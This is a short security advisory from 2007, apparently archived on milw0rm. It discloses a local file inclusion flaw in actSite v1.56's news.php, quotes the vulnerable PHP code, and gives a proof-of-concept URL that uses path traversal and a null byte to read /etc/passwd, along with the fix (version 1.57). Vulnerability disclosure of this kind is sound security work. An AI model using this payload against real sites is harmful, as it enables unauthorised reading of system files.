75 lines
No EOL
1.3 KiB
Text
75 lines
No EOL
1.3 KiB
Text
\#'#/
|
|
|
|
(-.-)
|
|
|
|
-----------------oOO---(_)---OOo-----------------
|
|
|
|
| actSite v1.56 (news.php) Local File Inclusion |
|
|
|
|
| coded by DNX |
|
|
|
|
-------------------------------------------------
|
|
|
|
[!] Discovered: DNX
|
|
|
|
[!] Vendor: http://www.actsite.de
|
|
|
|
[!] Detected: 02.09.2007
|
|
|
|
[!] Reported: 02.09.2007
|
|
|
|
[!] Remote: yes
|
|
|
|
|
|
|
|
[!] Background: actSite is a content management system based on PHP and MySQL
|
|
|
|
|
|
|
|
[!] Bug: in phpinc/news.php line 101
|
|
|
|
|
|
|
|
require PHP_INCLUDE_PATH."/inc/news/news_$_POST[do].php";
|
|
|
|
|
|
|
|
[!] PoC:
|
|
|
|
- http://[site]/[path]/phpinc/news.php?do=/../../../../../../../etc/passwd%00
|
|
|
|
|
|
|
|
[!] Description:
|
|
|
|
- So why we can inject code in a post variable per url? Let's do some research...
|
|
|
|
- In phpinc/news.php line 36
|
|
|
|
require_once('../config.php');
|
|
|
|
|
|
|
|
- Let's take a look in 'config.php' line 22
|
|
|
|
if(empty($BaseCfg['install_run'])) require_once($BaseCfg['BaseDir']."/phpinc/inc/csb.php");
|
|
|
|
|
|
|
|
- Ok, let's take a look in 'phpinc/inc/csb.php' line 18
|
|
|
|
if(getenv('REQUEST_METHOD') == "GET") {
|
|
|
|
foreach($_GET as $key => $val) {
|
|
|
|
$_POST[$key] =& $_GET[$key];
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
[!] Solution: Install security update to v1.57
|
|
|
|
# milw0rm.com [2007-10-01] |